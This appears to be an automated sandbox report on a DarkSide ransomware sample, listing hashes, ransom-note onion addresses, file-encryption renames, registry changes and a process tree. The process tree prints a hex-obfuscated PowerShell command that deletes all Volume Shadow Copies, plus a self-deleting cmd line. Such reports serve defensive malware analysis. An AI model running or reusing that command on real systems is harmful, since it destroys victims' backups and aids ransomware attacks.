Analysis
-
max time kernel
115s -
max time network
106s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
02-06-2023 15:02
Static task
static1
Behavioral task
behavioral1
Sample
Darkside.exe
Resource
win7-20230220-en
General
-
Target
Darkside.exe
-
Size
59KB
-
MD5
cfcfb68901ffe513e9f0d76b17d02f96
-
SHA1
766b30e5a37d1bc8d8fe5c7cacc314504a44ac1f
-
SHA256
17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61
-
SHA512
0d26fa9478f4626107e38c570d1bae1049b744181cf0395d95fb07675575ca393d88d4783bf31bdf11bef1da5648a5a53a6d95b21492f96b4de35c0ec323ae0c
-
SSDEEP
768:9jjV7Iax7F3DS4/S96/P3rsAc4ci5pwwX5+R4VYY23W5:vx7Fu4/i6/P3rlckx5+R4VDZ5
Malware Config
Extracted
C:\Users\Admin\README.6a2c0f68.TXT
darkside
http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF
http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Renames multiple (167) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Modifies extensions of user files 23 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
Darkside.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\DismountUpdate.tiff.6a2c0f68 Darkside.exe File renamed C:\Users\Admin\Pictures\ReadStart.tif => C:\Users\Admin\Pictures\ReadStart.tif.6a2c0f68 Darkside.exe File opened for modification C:\Users\Admin\Pictures\RequestFind.tiff.6a2c0f68 Darkside.exe File opened for modification C:\Users\Admin\Pictures\WaitRestore.tiff Darkside.exe File renamed C:\Users\Admin\Pictures\DismountUpdate.tiff => C:\Users\Admin\Pictures\DismountUpdate.tiff.6a2c0f68 Darkside.exe File opened for modification C:\Users\Admin\Pictures\MoveOpen.tif.6a2c0f68 Darkside.exe File opened for modification C:\Users\Admin\Pictures\RemoveReceive.raw.6a2c0f68 Darkside.exe File renamed C:\Users\Admin\Pictures\UnpublishWrite.raw => C:\Users\Admin\Pictures\UnpublishWrite.raw.6a2c0f68 Darkside.exe File opened for modification C:\Users\Admin\Pictures\DismountSave.tif.6a2c0f68 Darkside.exe File opened for modification C:\Users\Admin\Pictures\DismountUpdate.tiff Darkside.exe File renamed C:\Users\Admin\Pictures\RequestFind.tiff => C:\Users\Admin\Pictures\RequestFind.tiff.6a2c0f68 Darkside.exe File renamed C:\Users\Admin\Pictures\SendUnblock.crw => C:\Users\Admin\Pictures\SendUnblock.crw.6a2c0f68 Darkside.exe File renamed C:\Users\Admin\Pictures\SuspendReceive.crw => C:\Users\Admin\Pictures\SuspendReceive.crw.6a2c0f68 Darkside.exe File opened for modification C:\Users\Admin\Pictures\SuspendReceive.crw.6a2c0f68 Darkside.exe File opened for modification C:\Users\Admin\Pictures\UnpublishWrite.raw.6a2c0f68 Darkside.exe File renamed C:\Users\Admin\Pictures\WaitRestore.tiff => C:\Users\Admin\Pictures\WaitRestore.tiff.6a2c0f68 Darkside.exe File renamed C:\Users\Admin\Pictures\DismountSave.tif => C:\Users\Admin\Pictures\DismountSave.tif.6a2c0f68 Darkside.exe File opened for modification C:\Users\Admin\Pictures\ReadStart.tif.6a2c0f68 Darkside.exe File renamed C:\Users\Admin\Pictures\RemoveReceive.raw => C:\Users\Admin\Pictures\RemoveReceive.raw.6a2c0f68 Darkside.exe File opened for modification C:\Users\Admin\Pictures\RequestFind.tiff Darkside.exe File opened for modification C:\Users\Admin\Pictures\SendUnblock.crw.6a2c0f68 Darkside.exe File opened for modification C:\Users\Admin\Pictures\WaitRestore.tiff.6a2c0f68 Darkside.exe File renamed C:\Users\Admin\Pictures\MoveOpen.tif => C:\Users\Admin\Pictures\MoveOpen.tif.6a2c0f68 Darkside.exe -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 3536 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
Darkside.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\6a2c0f68.BMP" Darkside.exe Set value (str) \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\6a2c0f68.BMP" Darkside.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
Darkside.exepid process 1872 Darkside.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies Control Panel 1 IoCs
Processes:
Darkside.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Control Panel\Desktop\WallpaperStyle = "10" Darkside.exe -
Modifies registry class 8 IoCs
Processes:
rundll32.exeDarkside.exerundll32.exerundll32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.6a2c0f68 Darkside.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.6a2c0f68\ = "6a2c0f68" Darkside.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\6a2c0f68\DefaultIcon Darkside.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\6a2c0f68 Darkside.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\6a2c0f68\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\6a2c0f68.ico" Darkside.exe Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000_Classes\Local Settings rundll32.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
NOTEPAD.EXEpid process 3596 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exeDarkside.exepid process 1532 powershell.exe 1872 Darkside.exe 1872 Darkside.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
rundll32.exepid process 2776 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
Darkside.exepowershell.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 1872 Darkside.exe Token: SeSecurityPrivilege 1872 Darkside.exe Token: SeTakeOwnershipPrivilege 1872 Darkside.exe Token: SeLoadDriverPrivilege 1872 Darkside.exe Token: SeSystemProfilePrivilege 1872 Darkside.exe Token: SeSystemtimePrivilege 1872 Darkside.exe Token: SeProfSingleProcessPrivilege 1872 Darkside.exe Token: SeIncBasePriorityPrivilege 1872 Darkside.exe Token: SeCreatePagefilePrivilege 1872 Darkside.exe Token: SeBackupPrivilege 1872 Darkside.exe Token: SeRestorePrivilege 1872 Darkside.exe Token: SeShutdownPrivilege 1872 Darkside.exe Token: SeDebugPrivilege 1872 Darkside.exe Token: SeSystemEnvironmentPrivilege 1872 Darkside.exe Token: SeRemoteShutdownPrivilege 1872 Darkside.exe Token: SeUndockPrivilege 1872 Darkside.exe Token: SeManageVolumePrivilege 1872 Darkside.exe Token: 33 1872 Darkside.exe Token: 34 1872 Darkside.exe Token: 35 1872 Darkside.exe Token: SeDebugPrivilege 1532 powershell.exe Token: SeBackupPrivilege 1896 vssvc.exe Token: SeRestorePrivilege 1896 vssvc.exe Token: SeAuditPrivilege 1896 vssvc.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
Darkside.exedescription pid process target process PID 1872 wrote to memory of 1532 1872 Darkside.exe powershell.exe PID 1872 wrote to memory of 1532 1872 Darkside.exe powershell.exe PID 1872 wrote to memory of 1532 1872 Darkside.exe powershell.exe PID 1872 wrote to memory of 1532 1872 Darkside.exe powershell.exe PID 1872 wrote to memory of 3536 1872 Darkside.exe cmd.exe PID 1872 wrote to memory of 3536 1872 Darkside.exe cmd.exe PID 1872 wrote to memory of 3536 1872 Darkside.exe cmd.exe PID 1872 wrote to memory of 3536 1872 Darkside.exe cmd.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Darkside.exe"C:\Users\Admin\AppData\Local\Temp\Darkside.exe"1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\Darkside.exe >> NUL2⤵
- Deletes itself
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\GetTest.reg.6a2c0f681⤵
- Modifies registry class
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\RestoreProtect.xla.6a2c0f681⤵
- Modifies registry class
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\ReadLock.jpg.6a2c0f681⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\README.6a2c0f68.TXT1⤵
- Opens file in notepad (likely ransom note)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD59f7a99b2ba6cc7a9f978d0ce2af6ddec
SHA16c9ae9dd29c391719df38b5e9530c884b7256c63
SHA256dc8da56fecf5acb75b2bfa68478463482f5d7e95ed7f56c8a982f84f2225c6a8
SHA5125498519b8875fdd8c4531c4dd7c05fc7794b2d24f7a0a197ea88577c50f2615f8e7ac8067135d37c3697dc558e8387ef6864327501bee0f709420f8caececc0d
-
C:\Users\Admin\Desktop\README.6a2c0f68.TXTFilesize
3KB
MD5b58e2411168bbdbec635cf4001635db0
SHA1c130cd9caaaa514a6b98c1168e10d44a989d191a
SHA256652a74736e10402013fae584c967fc5ea3b7c2eac0a436d41759963b3d42e37a
SHA51287e2c3ecf3805a7b3945eed4472548a63cbaee7c004c3bce220524e1c6733b3eb780812b4d336f6b72a365c161c02e18b8101e405d00507ff902e88dd49ba30a
-
C:\Users\Admin\README.6a2c0f68.TXTFilesize
3KB
MD5b58e2411168bbdbec635cf4001635db0
SHA1c130cd9caaaa514a6b98c1168e10d44a989d191a
SHA256652a74736e10402013fae584c967fc5ea3b7c2eac0a436d41759963b3d42e37a
SHA51287e2c3ecf3805a7b3945eed4472548a63cbaee7c004c3bce220524e1c6733b3eb780812b4d336f6b72a365c161c02e18b8101e405d00507ff902e88dd49ba30a
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/1532-59-0x000000001B330000-0x000000001B612000-memory.dmpFilesize
2.9MB
-
memory/1532-60-0x0000000001F50000-0x0000000001F58000-memory.dmpFilesize
32KB
-
memory/1532-61-0x0000000002850000-0x00000000028D0000-memory.dmpFilesize
512KB
-
memory/1532-62-0x0000000002850000-0x00000000028D0000-memory.dmpFilesize
512KB
-
memory/1532-63-0x0000000002850000-0x00000000028D0000-memory.dmpFilesize
512KB
-
memory/2776-277-0x0000000003180000-0x0000000003190000-memory.dmpFilesize
64KB